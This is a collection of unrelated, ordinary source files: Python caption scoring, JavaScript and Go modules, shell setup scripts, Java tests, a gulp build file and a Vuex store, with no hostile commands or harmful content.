f_next_inputs=None,f_next_outputs=None
):
assert metric != 'perplexity'
if on_cpu:
raise NotImplementedError()
else:
assert model is not None
samples_valid, samples_test = generate_sample_gpu_single_process(
model_type,engine, options, sess, model,
f_init_inputs,f_init_outputs, f_next_inputs, f_next_outputs,
save_dir=save_dir,
beam=beam,
whichset=whichset)
valid_score, test_score = score_with_cocoeval(samples_valid, samples_test, engine)
scores_final = {}
scores_final['valid'] = valid_score
scores_final['test'] = test_score
if one_time:
return scores_final
return scores_final, processes, queue, rqueue, shared_params
def test_cocoeval():
engine = data_engine.Movie2Caption('attention', 'youtube2text',
video_feature='googlenet',
mb_size_train=20,
mb_size_test=20,
maxlen=50, n_words=20000,
n_frames=20, outof=None)
samples_valid = utils.load_txt_file('./test/valid_samples.txt')
samples_test = utils.load_txt_file('./test/test_samples.txt')
samples_valid = [sample.strip() for sample in samples_valid]
samples_test = [sample.strip() for sample in samples_test]
samples_valid = build_sample_pairs(samples_valid, engine.valid_ids)
samples_test = build_sample_pairs(samples_test, engine.test_ids)
valid_score, test_score = score_with_cocoeval(samples_valid, samples_test, engine)
print valid_score, test_score
if __name__ == '__main__':
test_cocoeval()
|
<reponame>nuxt/blueprints<gh_stars>10-100
export default {
modules: ['@nuxt/press']
}
|
package azuread
import (
"os"
"strings"
)
// This file contains feature flags for functionality which will prove more challenging to implement en-mass
var requireResourcesToBeImported = strings.EqualFold(os.Getenv("ARM_PROVIDER_STRICT"), "true")
|
if [ ! -d /usr/local/app/tars/app_log ]; then
mkdir -p /data/log/tars
mkdir -p /usr/local/app/tars
mkdir -p /data/tars/app_log
ln -s /data/tars/app_log /usr/local/app/tars/app_log
fi
if [ ! -d /usr/local/app/tars/remote_app_log ]; then
mkdir -p /data/tars/remote_app_log
ln -s /data/tars/remote_app_log /usr/local/app/tars/remote_app_log
fi
cd /usr/local/app/tars/
chmod +x tarsnode/util/*.sh
tarsnode/util/start.sh ;
|
<filename>stream-chat-javascript/node_modules/ripple-lib/dist/npm/transaction/payment.js
"use strict";
var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
if (k2 === undefined) k2 = k;
Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } });
}) : (function(o, m, k, k2) {
if (k2 === undefined) k2 = k;
o[k2] = m[k];
}));
var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
Object.defineProperty(o, "default", { enumerable: true, value: v });
}) : function(o, v) {
o["default"] = v;
});
var __importStar = (this && this.__importStar) || function (mod) {
if (mod && mod.__esModule) return mod;
var result = {};
if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);
__setModuleDefault(result, mod);
return result;
};
Object.defineProperty(exports, "__esModule", { value: true });
const _ = __importStar(require("lodash"));
const utils = __importStar(require("./utils"));
const validate = utils.common.validate;
const toRippledAmount = utils.common.toRippledAmount;
const paymentFlags = utils.common.txFlags.Payment;
const ValidationError = utils.common.errors.ValidationError;
const common_1 = require("../common");
const utils_1 = require("./utils");
function isMaxAdjustment(source) {
return source.maxAmount !== undefined;
}
function isMinAdjustment(destination) {
return destination.minAmount !== undefined;
}
function isXRPToXRPPayment(payment) {
const { source, destination } = payment;
const sourceCurrency = isMaxAdjustment(source)
? source.maxAmount.currency
: source.amount.currency;
const destinationCurrency = isMinAdjustment(destination)
? destination.minAmount.currency
: destination.amount.currency;
return ((sourceCurrency === 'XRP' || sourceCurrency === 'drops') &&
(destinationCurrency === 'XRP' || destinationCurrency === 'drops'));
}
function isIOUWithoutCounterparty(amount) {
return (amount &&
amount.currency !== 'XRP' &&
amount.currency !== 'drops' &&
amount.counterparty === undefined);
}
function applyAnyCounterpartyEncoding(payment) {
_.forEach([payment.source, payment.destination], (adjustment) => {
_.forEach(['amount', 'minAmount', 'maxAmount'], (key) => {
if (isIOUWithoutCounterparty(adjustment[key])) {
adjustment[key].counterparty = adjustment.address;
}
});
});
}
function createMaximalAmount(amount) {
const maxXRPValue = '100000000000';
const maxIOUValue = '999999999999999900000000000000000000000000000000000000000000000000000000000000000000000000000000';
let maxValue;
if (amount.currency === 'XRP') {
maxValue = maxXRPValue;
}
else if (amount.currency === 'drops') {
maxValue = common_1.xrpToDrops(maxXRPValue);
}
else {
maxValue = maxIOUValue;
}
return _.assign({}, amount, { value: maxValue });
}
function validateAndNormalizeAddress(address, expectedTag) {
const classicAddress = utils_1.getClassicAccountAndTag(address, expectedTag);
classicAddress.tag =
classicAddress.tag === false ? undefined : classicAddress.tag;
return classicAddress;
}
function createPaymentTransaction(address, paymentArgument) {
const payment = _.cloneDeep(paymentArgument);
applyAnyCounterpartyEncoding(payment);
const sourceAddressAndTag = validateAndNormalizeAddress(payment.source.address, payment.source.tag);
const addressToVerifyAgainst = validateAndNormalizeAddress(address, undefined);
if (addressToVerifyAgainst.classicAccount !== sourceAddressAndTag.classicAccount) {
throw new ValidationError('address must match payment.source.address');
}
if (addressToVerifyAgainst.tag !== undefined &&
sourceAddressAndTag.tag !== undefined &&
addressToVerifyAgainst.tag !== sourceAddressAndTag.tag) {
throw new ValidationError('address includes a tag that does not match payment.source.tag');
}
const destinationAddressAndTag = validateAndNormalizeAddress(payment.destination.address, payment.destination.tag);
if ((isMaxAdjustment(payment.source) && isMinAdjustment(payment.destination)) ||
(!isMaxAdjustment(payment.source) && !isMinAdjustment(payment.destination))) {
throw new ValidationError('payment must specify either (source.maxAmount ' +
'and destination.amount) or (source.amount and destination.minAmount)');
}
const destinationAmount = isMinAdjustment(payment.destination)
? payment.destination.minAmount
: payment.destination.amount;
const sourceAmount = isMaxAdjustment(payment.source)
? payment.source.maxAmount
: payment.source.amount;
const amount = isMinAdjustment(payment.destination) && !isXRPToXRPPayment(payment)
? createMaximalAmount(destinationAmount)
: destinationAmount;
const txJSON = {
TransactionType: 'Payment',
Account: sourceAddressAndTag.classicAccount,
Destination: destinationAddressAndTag.classicAccount,
Amount: toRippledAmount(amount),
Flags: 0
};
if (payment.invoiceID !== undefined) {
txJSON.InvoiceID = payment.invoiceID;
}
if (sourceAddressAndTag.tag !== undefined) {
txJSON.SourceTag = sourceAddressAndTag.tag;
}
if (destinationAddressAndTag.tag !== undefined) {
txJSON.DestinationTag = destinationAddressAndTag.tag;
}
if (payment.memos !== undefined) {
txJSON.Memos = _.map(payment.memos, utils.convertMemo);
}
if (payment.noDirectRipple === true) {
txJSON.Flags |= paymentFlags.NoRippleDirect;
}
if (payment.limitQuality === true) {
txJSON.Flags |= paymentFlags.LimitQuality;
}
if (!isXRPToXRPPayment(payment)) {
if (payment.allowPartialPayment || isMinAdjustment(payment.destination)) {
txJSON.Flags |= paymentFlags.PartialPayment;
}
txJSON.SendMax = toRippledAmount(sourceAmount);
if (isMinAdjustment(payment.destination)) {
txJSON.DeliverMin = toRippledAmount(destinationAmount);
}
if (payment.paths !== undefined) {
txJSON.Paths = JSON.parse(payment.paths);
}
}
else if (payment.allowPartialPayment === true) {
throw new ValidationError('XRP to XRP payments cannot be partial payments');
}
return txJSON;
}
function preparePayment(address, payment, instructions = {}) {
try {
validate.preparePayment({ address, payment, instructions });
const txJSON = createPaymentTransaction(address, payment);
return utils.prepareTransaction(txJSON, this, instructions);
}
catch (e) {
return Promise.reject(e);
}
}
exports.default = preparePayment;
//# sourceMappingURL=payment.js.map |
<filename>software/database/src/test/java/brooklyn/entity/database/postgresql/PostgreSqlChefTest.java
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package brooklyn.entity.database.postgresql;
import java.util.Random;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.testng.Assert;
import org.testng.annotations.Test;
import brooklyn.entity.basic.Entities;
import brooklyn.entity.chef.ChefLiveTestSupport;
import brooklyn.entity.database.DatastoreMixins.DatastoreCommon;
import brooklyn.entity.database.VogellaExampleAccess;
import brooklyn.entity.effector.EffectorTasks;
import brooklyn.entity.software.SshEffectorTasks;
import brooklyn.location.PortRange;
import brooklyn.location.basic.PortRanges;
import brooklyn.location.basic.SshMachineLocation;
import brooklyn.util.task.system.ProcessTaskWrapper;
import brooklyn.util.time.Duration;
import com.google.common.collect.ImmutableList;
/**
* Tests Chef installation of PostgreSql. Requires chef-server (knife).
* <p>
* To be able to run repeatedly on the same box, you will need the patched version of the postgresql library,
* at https://github.com/opscode-cookbooks/postgresql/pull/73 .
*
* @author alex
*
*/
public class PostgreSqlChefTest extends ChefLiveTestSupport {
private static final Logger log = LoggerFactory.getLogger(PostgreSqlChefTest.class);
PostgreSqlNode psql;
@Test(groups="Live")
public void testPostgresStartsAndStops() throws Exception {
ChefLiveTestSupport.installBrooklynChefHostedConfig(app);
psql = app.createAndManageChild(PostgreSqlSpecs.specChef());
app.start(ImmutableList.of(targetLocation));
Entities.submit(psql, SshEffectorTasks.ssh("ps aux | grep [p]ostgres").requiringExitCodeZero());
SshMachineLocation targetMachine = EffectorTasks.getSshMachine(psql);
psql.stop();
try {
// if host is still contactable ensure postgres is not running
ProcessTaskWrapper<Integer> t = Entities.submit(app, SshEffectorTasks.ssh("ps aux | grep [p]ostgres").machine(targetMachine).allowingNonZeroExitCode());
t.getTask().blockUntilEnded(Duration.TEN_SECONDS);
if (!t.isDone())
Assert.fail("Task not finished yet: "+t.getTask());
Assert.assertNotEquals(t.get(), (Integer)0, "Task ended with code "+t.get()+"; output: "+t.getStdout() );
} catch (Exception e) {
// host has been killed, that is fine
log.info("Machine "+targetMachine+" destroyed on stop (expected - "+e+")");
}
}
@Test(groups="Live")
public void testPostgresScriptAndAccess() throws Exception {
ChefLiveTestSupport.installBrooklynChefHostedConfig(app);
PortRange randomPort = PortRanges.fromString(String.format("%d+", 5420 + new Random().nextInt(10)));
psql = app.createAndManageChild(PostgreSqlSpecs.specChef()
.configure(DatastoreCommon.CREATION_SCRIPT_CONTENTS, PostgreSqlIntegrationTest.CREATION_SCRIPT)
.configure(PostgreSqlNode.POSTGRESQL_PORT, randomPort)
.configure(PostgreSqlNode.SHARED_MEMORY, "8MB")
);
app.start(ImmutableList.of(targetLocation));
String url = psql.getAttribute(DatastoreCommon.DATASTORE_URL);
log.info("Trying to connect to "+psql+" at "+url);
Assert.assertNotNull(url);
Assert.assertTrue(url.contains("542"));
new VogellaExampleAccess("org.postgresql.Driver", url).readModifyAndRevertDataBase();
}
}
|
#!/bin/sh
# Annotate the plaintext documents
ODINSON_DATA_HOME="$(pwd)/data/odinson"
docker run \
--name="odinson-extras" \
-it \
--rm \
-e "HOME=/app" \
-e "JAVA_OPTS=-Dodinson.extra.processorType=CluProcessor" \
-v "$ODINSON_DATA_HOME:/app/data/odinson" \
--entrypoint "bin/annotate-text" \
"lumai/odinson-extras:latest"
|
#!/bin/bash
# chmod +x matplotlib_ja.sh
# sh ./matplotlib_ja.sh
# Download Japanese fonts and for matplotlib.
function logging() {
echo -e "\033[0;32m$1\033[0m"
}
FONT_PATH="https://ipafont.ipa.go.jp/IPAfont/IPAfont00303.zip"
TMP_NAME="font.zip"
FONT_DIR="IPAfont00303"
FONT_FILENAME="ipam.ttf"
FONT_NAME="IPAMincho"
MATPLOTLIBPATH=$(python3 -c "import matplotlib; print(matplotlib.__path__[0])")
CASH_DIR="$(python3 -c 'import matplotlib; print(matplotlib.get_cachedir())')/fontList.cache"
echo "[Download and set up Japanese fonts for 'matplotlib']"
echo -n "1. Download font from "; logging $FONT_PATH
echo -n "2. Then, set it to "; logging ${MATPLOTLIBPATH}/mpl-data/fonts/ttf/${FONT_FILENAME}
echo -n "3. Add 'font.family : IPAMincho' to "; logging ${MATPLOTLIBPATH}/mpl-data/matplotlibrc
wget ${FONT_PATH} -O ${TMP_NAME} && \
unzip ${TMP_NAME} && \
cp ${FONT_DIR}/${FONT_FILENAME} ${MATPLOTLIBPATH}/mpl-data/fonts/ttf/${FONT_FILENAME} && \
echo "font.family : ${FONT_NAME}" >> ${MATPLOTLIBPATH}/mpl-data/matplotlibrc && \
# Rebuild the font cache.
if [ -e $CASH_DIR ]; then
rm ${CASH_DIR}
fi
if [ -e ${TMP_NAME} ]; then
rm ${TMP_NAME}
fi
if [ -e ${FONT_DIR} ]; then
rm -r ${FONT_DIR}
fi |
#!/bin/sh
TEST_HOME=/home/bingli/testhttp
count 50
while [ "$count" != 0 ]; do
java -jar test.jar com.bingli.performance.TestHttp http://localhost:8080/WebContainerTest/ /home/bingli/testhttp/error$count.log 1>/dev/null 2>&1 &
let count--
done |
<reponame>ComfortablyCoding/strapi-plugin-io
'use strict';
/**
* Retrieves all strapi rooms (roles).
*
*/
const getStrapiRooms = () =>
strapi.entityService.findMany('plugin::users-permissions.role', {
fields: ['name'],
populate: {
permissions: {
fields: ['action'],
},
},
});
module.exports = {
getStrapiRooms,
};
|
const gulp = require('gulp');
const gutil = require("gulp-util");
const babel = require('gulp-babel');
const webpack = require('webpack-stream');
const postcss = require('gulp-postcss');
const postcssApply = require('postcss-apply');
const postcssImport = require('postcss-import');
const postcssMixins = require('postcss-mixins');
const postcssCssnext = require('postcss-cssnext');
const postcssComments = require('postcss-discard-comments');
const postcssNested = require('postcss-nested');
const postcssEach = require('postcss-each');
const postcssGradient = require('postcss-easing-gradients');
const postcssFor = require('postcss-for');
const postcssCond = require('postcss-conditionals');
const postcssSimple = require('postcss-simple-vars');
const postcssProps = require('postcss-custom-properties');
const postcssReporter = require('postcss-reporter');
const sourcemaps = require('gulp-sourcemaps');
const cssnano = require('gulp-cssnano');
const rename = require('gulp-rename');
const eslint = require('gulp-eslint');
const banner = require('gulp-banner');
const manifest = require('gulp-manifest');
const modernizr = require('gulp-modernizr');
const imagemin = require('gulp-imagemin');
const htmlmin = require('gulp-htmlmin');
const notify = require('gulp-notify');
const iconfont = require('gulp-iconfont');
const consolidate = require('gulp-consolidate');
const replace = require('gulp-replace');
const pkg = require('./package.json');
const browserSync = require('browser-sync').create();
const reload = browserSync.reload;
const comment = `/*!
* ${pkg.name}
*
* Made with ❤ by ${pkg.author}
*
* Copyright (c) ${(new Date()).getFullYear()} ${pkg.copyright}
*/
`;
const src = {
cssAll: 'assets/css/_src/**/*.css',
cssMain: 'assets/css/_src/main.css',
cssDest: 'assets/css',
jsAll: 'assets/js/_src/**/*.js',
jsMain: 'assets/js/_src/main.js',
jsDest: 'assets/js',
iconsAll: 'assets/icons/*.svg',
iconsCss: 'assets/icons/_template/_icons.css',
iconsCssDest: 'assets/css/_src/partials/modules/',
iconsDest: 'assets/fonts',
};
const babelMinify = [
'minify',
{
mangle: {
exclude: ['jQuery', '$']
},
deadcode: true,
removeConsole: true,
removeDebugger: true,
removeUndefined: true,
}
];
const prefixConfig = {
diff: true,
map: false,
remove: false,
};
const eslintConfig = require('./.config/eslint.config');
const webpackConfig = require('./.config/webpack.config');
gulp.task('watch', () => {
browserSync.init(['**/*.html', '**/*.php'], {
proxy: 'xmas-2017.local',
port: 3000,
open: true,
notify: false,
});
gulp.watch(src.cssAll, ['css']);
gulp.watch(src.jsAll, ['js']);
gulp.watch(src.iconsAll, ['iconfont']);
});
gulp.task('css', (done) => {
return gulp.src(src.cssMain)
// .pipe(sourcemaps.init())
.pipe(postcss([
postcssImport,
postcssMixins,
postcssProps,
postcssFor,
postcssEach,
postcssSimple,
postcssCond,
postcssGradient,
postcssApply,
postcssCssnext(prefixConfig),
postcssNested,
postcssComments({removeAll: true}),
postcssReporter({ clearMessages: true }),
]))
.on('error', done)
// .pipe(sourcemaps.write())
.pipe(rename('bundle.css'))
.pipe(banner(comment))
.pipe(gulp.dest(src.cssDest))
.pipe(cssnano({
discardComments: {
removeAll: true
},
zindex: false,
}))
.pipe(rename('bundle.min.css'))
.pipe(banner(comment))
.pipe(gulp.dest(src.cssDest))
.pipe(reload({stream: true}))
.pipe(notify('css done'));
});
gulp.task('js', ['eslint', 'fallback'], () => {
return gulp.src(src.jsMain)
// .pipe(webpack(webpackConfig)).on('error', onError)
.pipe(babel({
presets: ['env'],
}))
.pipe(rename('bundle.js'))
.pipe(banner(comment))
.pipe(gulp.dest(src.jsDest))
.pipe(replace(/window\.app\s\=.*/, ''))
.pipe(babel({
presets: [babelMinify]
}))
.pipe(rename('bundle.min.js'))
.pipe(banner(comment))
.pipe(gulp.dest(src.jsDest))
.pipe(reload({stream: true}))
.pipe(notify('js done'));
});
gulp.task('eslint', () => {
return gulp.src(src.jsAll)
.pipe(eslint(eslintConfig))
.pipe(eslint.format());
});
gulp.task('fallback', () => {
return gulp.src('assets/js/_src/fallback.js')
.pipe(babel({
presets: ['env'],
}))
.pipe(banner(comment))
.pipe(gulp.dest(src.jsDest))
.pipe(babel({
presets: [babelMinify]
}))
.pipe(rename('fallback.min.js'))
.pipe(banner(comment))
.pipe(gulp.dest(src.jsDest));
});
gulp.task('vendor', () => {
return gulp.src([
// 'node_modules/jquery/dist/jquery*',
'node_modules/promise-polyfill/promise.*',
// 'node_modules/objectFitPolyfill/dist/*',
// 'node_modules/intersection-observer/intersection-observer.js',
'node_modules/object.assign-polyfill/object.assign.js',
])
.pipe(gulp.dest('assets/js/vendor'));
});
gulp.task('modernizr', () => {
return gulp.src([`${src.cssDest}/*.css`, `${src.jsDest}/*.js`])
.pipe(modernizr({
"cache": false,
"extra" : {
"shiv" : true,
"printshiv" : true,
"load" : true,
"mq" : true,
"cssclasses" : true
},
"options" : [
"setClasses",
"addTest",
"html5printshiv",
"testProp",
"fnBind",
"mq"
],
"excludeTests": [
"hidden"
],
"parseFiles" : true,
"crawl" : true,
"uglify" : true,
"matchCommunityTests" : true,
}))
.pipe(babel({
presets: [babelMinify]
}))
.pipe(gulp.dest(`${src.jsDest}/vendor`));
});
gulp.task('manifest', () => {
return gulp.src(['./**/*.*'])
.pipe(manifest({
hash: true,
preferOnline: false,
network: ['*'],
filename: 'manifest.appcache',
exclude: [
'*.appcache',
'*.lock',
'**/*.json',
'**/_src/**/*.*',
'assets/icons/**/*.*',
'webpack.config.js',
'gulpfile.js',
'bower_components/**/*.*',
'node_modules/**/*.*',
]
}))
.pipe(gulp.dest('./'));
});
gulp.task('imagemin', () => {
return gulp.src('assets/img/**/*')
.pipe(imagemin())
.pipe(gulp.dest('assets/img'));
});
gulp.task('htmlmin', ['public'], () => {
return gulp.src('*.html')
.pipe(htmlmin())
.pipe(gulp.dest('./public'));
});
gulp.task('public', () => {
return gulp.src([
'**/.htaccess',
'*.png',
'*.ico',
'*.txt',
'*.appcache',
'assets/**/*.*',
'!assets/**/_src/*',
])
.pipe(gulp.dest('./public'));
});
gulp.task('iconfont', () => {
gulp.src(src.iconsAll)
.pipe(iconfont({
fontName: 'icons',
prependUnicode: false,
formats: ['woff2', 'woff', 'svg'],
normalize: true,
centerHorizontally: true,
fontHeight: 1000 // IMPORTANT
}))
.on('glyphs', (glyphs, options) => {
glyphs = glyphs.map((glyph) => {
glyph.codepoint = glyph.unicode[0].charCodeAt(0).toString(16).toUpperCase();
return glyph;
});
gulp.src(src.iconsCss)
.pipe(consolidate('lodash', Object.assign({}, options, {
timestamp: Math.round(+new Date()/1000),
param: true,
cssPrefix: 'icon-',
fontPath: '../fonts/',
})))
.pipe(rename('_icons.css'))
.pipe(gulp.dest(src.iconsCssDest));
})
.pipe(gulp.dest(src.iconsDest));
});
gulp.task('default', ['dist', 'watch']);
gulp.task('dev', ['css', 'js', 'fallback', 'watch']);
gulp.task('dist', ['css', 'js', 'fallback', 'vendor'], () => {
return gulp.src('./')
.pipe(notify('dist done'));
});
// generic error handler
function onError(err) {
gutil.log(err.message);
this.emit('end');
}
|
#!/usr/bin/env bash
session_choices_format() {
local name="#{session_name}"
local windows="#{session_windows} windows"
local attached="#{?#{session_attached},#attached,}"
echo "[ $name: $windows $attached ]"
}
session_choices() {
local choices=$(tmux list-sessions -F "`session_choices_format`" 2>/dev/null)
echo "$choices" | while read line; do
echo "Attach ==> $line"
done
echo "$choices" | while read line; do
echo "Kill ==> $line"
done
echo "Kill server"
echo "Exit"
}
session_control() {
local selected=$(echo "`session_choices`" | peco)
local selected_id=$(echo "$selected" | awk '{print $4}' | sed "s/://g")
case "$selected" in
*Attach* ) tmux switch-client -t "$selected_id" ;;
*Kill* )
tmux kill-session -t "$selected_id"
$(tmux has_session 2>/dev/null) && session_control
;;
"Kill server" ) tmux kill-server ;;
"Exit" ) return ;;
esac
}
session_control
|
<filename>src/components/layout.js
/**
* Layout component that queries for data
* with Gatsby's useStaticQuery component
*
* See: https://www.gatsbyjs.org/docs/use-static-query/
*/
import React from 'react';
import PropTypes from 'prop-types';
import Helmet from 'react-helmet';
import { useStaticQuery, graphql } from 'gatsby';
import Header from './Header';
import Footer from './Footer';
import './layout.css';
const Layout = ({ children }) => {
const data = useStaticQuery(graphql`
query SiteTitleQuery {
site {
siteMetadata {
title
description
keywords
}
}
allContentfulLink(sort: {fields: [createdAt], order: ASC }){
edges {
node {
title
url
createdAt
}
}
}
}
`);
return (
<div>
<Helmet
title={data.site.siteMetadata.title}
meta={[
{ name: 'description', content: data.site.siteMetadata.description },
{ name: 'keywords', content: data.site.siteMetadata.keywords },
]}
/>
<Header data={data} />
<main>{children}</main>
<Footer data={data}>
Backgrounds made in Cinema 4D,
iOS app in Swift, site in React.
<a href="mailto:<EMAIL>">Email us today</a>
{' '}
to ask anything.
</Footer>
{/* <footer >
©
{new Date().getFullYear()}
, Built with
{' '}
<a href="https://www.gatsbyjs.org">Gatsby</a>
</footer> */}
</div>
);
};
Layout.propTypes = {
children: PropTypes.node.isRequired,
};
export default Layout;
|
import { before } from 'mocha';
import { getArtblockInfo, getOpenseaInfo } from '../api_data';
var assert = require('assert');
const nock = require('nock');
process.env.NODE_ENV = 'test';
describe('ArtBlocks api_data', () => {
before(() => {
process.env.IS_PBAB = 'false';
process.env.PBAB_CONTRACT = '';
process.env.THUMBNAIL_LOCATION =
'https://artblocks-mainthumb.s3.amazonaws.com';
});
describe('#getArtblockInfo', () => {
before(() => {
if (!nock.isActive()) nock.activate();
const tokenScope = nock('https://token.artblocks.io')
.get('/1')
.reply(200, {
name: 'Recursion #1',
image: 'https://media.artblocks.io/1.png',
external_url: 'https://www.artblocks.io/token/1',
});
const imgScope = nock('https://artblocks-mainthumb.s3.amazonaws.com')
.get('/1.png')
.reply(200, {
data: new ArrayBuffer(8),
});
tokenScope;
imgScope;
});
afterEach(nock.cleanAll);
it('gets additional meta needed for alert', async () => {
const { name, image, external_url, imgBinary } = await getArtblockInfo(
'1'
);
assert.equal(name, 'Recursion #1');
assert.equal(image, 'https://media.artblocks.io/1.png');
assert.equal(external_url, 'https://www.artblocks.io/token/1');
const buffer = Buffer.isBuffer(imgBinary);
assert.equal(buffer, true);
});
});
describe('#getOpenseaInfo', () => {
const account = '0x104e1e2725dbbd2d75eb1a46e880932d2e1d4c12';
before(() => {
const openSeaScope = nock('https://api.opensea.io')
.get(`/account/${account}/`)
.reply(200, { data: { user: { username: 'ABKING123' } } });
openSeaScope;
});
it('gets owner data for alert', async () => {
const mintedBy = await getOpenseaInfo(account);
assert.equal(mintedBy, 'ABKING123');
});
});
});
describe('PBAB api_data', () => {
before(() => {
process.env.IS_PBAB = 'true';
process.env.PBAB_CONTRACT = '0x87c6e93fc0b149ec59ad595e2e187a4e1d7fdc25';
});
describe('#getArtblockInfo', () => {
before(() => {
if (!nock.isActive()) nock.activate();
const tokenScope = nock('https://token.artblocks.io')
.get('/0x87c6e93fc0b149ec59ad595e2e187a4e1d7fdc25/1')
.reply(200, {
name: 'Recursion #1',
image: 'https://media.artblocks.io/1.png',
external_url: 'https://www.artblocks.io/token/1',
});
const imgScope = nock('https://media.artblocks.io')
.get('/1.png')
.reply(200, {
data: new ArrayBuffer(8),
});
tokenScope;
imgScope;
});
afterEach(nock.cleanAll);
it('gets additional meta needed for alert', async () => {
const { name, image, external_url, imgBinary } = await getArtblockInfo(
'1'
);
assert.equal(name, 'Recursion #1');
assert.equal(image, 'https://media.artblocks.io/1.png');
assert.equal(external_url, 'https://www.artblocks.io/token/1');
const buffer = Buffer.isBuffer(imgBinary);
assert.equal(buffer, true);
});
});
describe('#getOpenseaInfo', () => {
const account = '0x104e1e2725dbbd2d75eb1a46e880932d2e1d4c12';
before(() => {
const openSeaScope = nock('https://api.opensea.io')
.get(`/account/${account}/`)
.reply(200, { data: { user: { username: 'ABKING123' } } });
openSeaScope;
});
it('gets owner data for alert', async () => {
const mintedBy = await getOpenseaInfo(account);
assert.equal(mintedBy, 'ABKING123');
});
});
});
|
package greedy;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.StringTokenizer;
/**
*
* @author exponential-e
* 백준 20117번: 호반우의 이상한 품질 계산법
*
* @see https://www.acmicpc.net/problem/20117
*
*/
public class Boj20117 {
public static void main(String[] args) throws Exception{
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
int N = Integer.parseInt(br.readLine());
int[] hobanwoo = new int[N];
StringTokenizer st = new StringTokenizer(br.readLine());
for(int i = 0; i < N; i++) {
hobanwoo[i] = Integer.parseInt(st.nextToken());
}
System.out.println(maxCost(hobanwoo));
}
private static int maxCost(int[] arr) {
int value = 0;
Arrays.sort(arr);
int div = arr.length / 2;
int half = arr.length % 2 == 1 ? div + 1: div;
for(int i = arr.length - 1; i >= half; i--) { // tied with the smallest & largest
value += arr[i] * 2;
}
return value + (arr.length % 2 == 1 ? arr[div]: 0);
}
}
|
#!/bin/sh -e
scripts_home=/root/scripts/initial-setup.d
install -v -o 0 -g 0 -m 755 -p "files/9899-edit-cmdline.sh" "${ROOTFS_DIR}/${scripts_home}/"
|
start
external_tools
finish
|
<reponame>yannzido/new
import { ActionTree, GetterTree, Module, MutationTree } from 'vuex';
import { RootState } from '../types';
export interface KeysState {
expandedTokens: string[];
}
export const tokensState: KeysState = {
expandedTokens: [],
};
export const getters: GetterTree<KeysState, RootState> = {
tokenExpanded: (state) => (id: string) => {
return state.expandedTokens.includes(id);
},
};
export const mutations: MutationTree<KeysState> = {
setTokenHidden(state, id: string) {
const index = state.expandedTokens.findIndex((element: any) => {
return element === id;
});
if (index >= 0) {
state.expandedTokens.splice(index, 1);
}
},
setTokenExpanded(state, id: string) {
const index = state.expandedTokens.findIndex((element: any) => {
return element === id;
});
if (index === -1) {
state.expandedTokens.push(id);
}
},
};
export const actions: ActionTree<KeysState, RootState> = {
expandToken({ commit, rootGetters }, id: string) {
commit('setTokenExpanded', id);
},
hideToken({ commit, rootGetters }, id: string) {
commit('setTokenHidden', id);
},
};
export const keysModule: Module<KeysState, RootState> = {
namespaced: false,
state: tokensState,
getters,
actions,
mutations,
};
|
<gh_stars>0
var EllaExchangeService = artifacts.require("./EllaExchangeService.sol");
module.exports = async (deployer) => {
await deployer.deploy(
EllaExchangeService,
"0x",
"0x",
true,
"0x",
"0x"
);
};
|
<reponame>andreapatri/cms_journal<filename>node_modules/@buffetjs/hooks/src/useIsMounted/index.js<gh_stars>0
import { useRef, useEffect } from 'react';
// Hook taken from https://github.com/hupe1980/react-is-mounted-hook
function useIsMounted() {
const ref = useRef(true);
useEffect(() => {
ref.current = true;
return () => {
ref.current = false;
};
}, []);
return ref.current;
}
export default useIsMounted;
|
#!/bin/bash
# build src
rm -rf out/src
mkdir -p out/src
./node_modules/.bin/babel --out-dir out/src src
# build test
rm -rf out/test/src
mkdir -p out/test/src
./node_modules/.bin/babel --out-dir out/test/src test/src
|
import React from 'react';
import { View, StyleSheet, TextInput } from 'react-native';
import { API } from './api';
export default class App extends React.Component {
state = {
query: '',
results: []
};
fetchData = async () => {
const response = await API.get(
`/search?q=${this.state.query}&api_key=${API_KEY}`
);
this.setState({ results: response.data.hits });
};
handleChange = query => {
this.setState({ query }, () => this.fetchData());
};
render() {
// render components
}
}
const styles = StyleSheet.create({
// style declarations
}); |
<filename>client/src/components/Order/OrderDetail.js
import React from "react";
import "./Order";
class OrderDetail extends React.Component {
state = {
tax: 0,
total: 0,
};
componentDidMount = () => {
console.log(this.props.cart);
const order = this.props.cart.reduce(
(acc, item) => {
console.log({ item });
item = item.price.substr(1);
item = Number(item);
acc.total += item;
return acc;
},
{ total: 0 }
);
order.tax = order.total >= 0 ? order.total * 0.06 : 0;
this.setState({ tax: order.tax, total: order.total });
};
handleOrderDetails = () => {
return (
<div class="row">
<div class="col m12 m6">
<div class="card blue-grey darken-1">
<div class="card-content white-text">
<label className="tax">Tax</label>
<h3>{this.state.tax}</h3>
<label className="total">total</label>
<h2>{this.state.total}</h2>
<button name="btns">submit</button>
</div>
</div>
</div>
</div>
);
};
render() {
return (
<>
<div>{this.handleOrderDetails()}</div>
</>
);
}
}
export default OrderDetail;
|
#!/usr/bin/env bash
set -euo pipefail
make bundle
npx openapi-to-postmanv2 --pretty --spec dist/Lob-API-public-bundled.yml --output dist/Lob-API-postman.txt
|
<reponame>darwinbeing/deepdriving-tensorflow<gh_stars>1-10
from .wrapper import CDriveController |
import Input from './Input';
import './index.less';
export * from './Input';
export default Input;
|
<reponame>vany152/FilesHash
# /* **************************************************************************
# * *
# * (C) Copyright <NAME> 2011.
# * Distributed under the Boost Software License, Version 1.0. (See
# * accompanying file LICENSE_1_0.txt or copy at
# * http://www.boost.org/LICENSE_1_0.txt)
# * *
# ************************************************************************** */
#
# /* See http://www.boost.org for most recent version. */
#
